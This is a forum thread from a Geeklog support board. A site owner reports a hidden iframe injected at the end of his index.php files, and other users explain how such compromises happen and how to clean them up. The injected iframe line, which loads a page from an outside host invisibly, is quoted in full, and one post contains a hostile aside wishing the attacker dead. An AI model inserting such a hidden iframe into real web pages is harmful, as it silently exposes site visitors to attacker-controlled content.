Welcome to Geeklog, Anonymous Saturday, December 21 2024 @ 10:12 pm EST
Geeklog Forums
My site was hacked...
Status: offline
sirandre007
Forum User
Newbie
Registered: 01/11/06
Posts: 6
Not sure how this happened, and caught it by chance.
I was loading my site and on I.E. 6 on the lower left side it usually says stuff so fast you can't read it, like the site it is opening.
Well it was running "slow" and I noticed opening site www.911traff.org.....
I'm like, what the heck is that site? Well after a quick look at in index.php file I found pasted on the end
<IFRAME name='StatPage' src='http://www.911traff.org/trf/traf.php'
width=5 height=5 style='display:none'></IFRAME>
Registered to some piece of crap in Russia! Hope he dies from radiation poisoning from Chernobyl!
He would have to have access to my cpanel or ftp user right?
I was loading my site and on I.E. 6 on the lower left side it usually says stuff so fast you can't read it, like the site it is opening.
Well it was running "slow" and I noticed opening site www.911traff.org.....
I'm like, what the heck is that site? Well after a quick look at in index.php file I found pasted on the end
<IFRAME name='StatPage' src='http://www.911traff.org/trf/traf.php'
width=5 height=5 style='display:none'></IFRAME>
Registered to some piece of crap in Russia! Hope he dies from radiation poisoning from Chernobyl!
He would have to have access to my cpanel or ftp user right?
12
16
Quote
Status: offline
sirandre007
Forum User
Newbie
Registered: 01/11/06
Posts: 6
ver 1.4.1
I installed mychat on it
the site is www.bathmiblog.com.
I went through most the code and found it in the forum index.php also.
I installed mychat on it
the site is www.bathmiblog.com.
I went through most the code and found it in the forum index.php also.
15
15
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Reminds me of this incident. In that case, it was actually an entire server that had been hacked and several Geeklog sites on that server had been modified ...
bye, Dirk
bye, Dirk
21
19
Quote
farangpainai
Anonymous
Happened to me also, all my websites on our server where infected.
It seems that it is a sort of script that a hacker runs in Cpanel, and all index.htm, index.html, index.php....etc had code added at the end of the file.
This has little to do with Geeklog, to fix this open index.php and all index.html and remove the iframe code. Upgrade to the latest Cpanel version, if you host with a hosting company, inform the hosting company that they have a problem.
Because all index.... files on all domains on that server are probably effected...
It seems that it is a sort of script that a hacker runs in Cpanel, and all index.htm, index.html, index.php....etc had code added at the end of the file.
This has little to do with Geeklog, to fix this open index.php and all index.html and remove the iframe code. Upgrade to the latest Cpanel version, if you host with a hosting company, inform the hosting company that they have a problem.
Because all index.... files on all domains on that server are probably effected...
17
14
Quote
ashleigh
Anonymous
Hey Dudes,
I have seen this happen also. The hackers use the FTP account to access these index file. So make sure u don't have a crappy Password for your FTP. Better to Use a combination of caps and numbers with atleast 8 chars. As i have see they only get access to a particular FTP account but not the whole server or other users on the server. My servers uses Hsphere Control panel.
Ashleigh
I have seen this happen also. The hackers use the FTP account to access these index file. So make sure u don't have a crappy Password for your FTP. Better to Use a combination of caps and numbers with atleast 8 chars. As i have see they only get access to a particular FTP account but not the whole server or other users on the server. My servers uses Hsphere Control panel.
Ashleigh
12
12
Quote
All times are EST. The time is now 10:12 pm.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content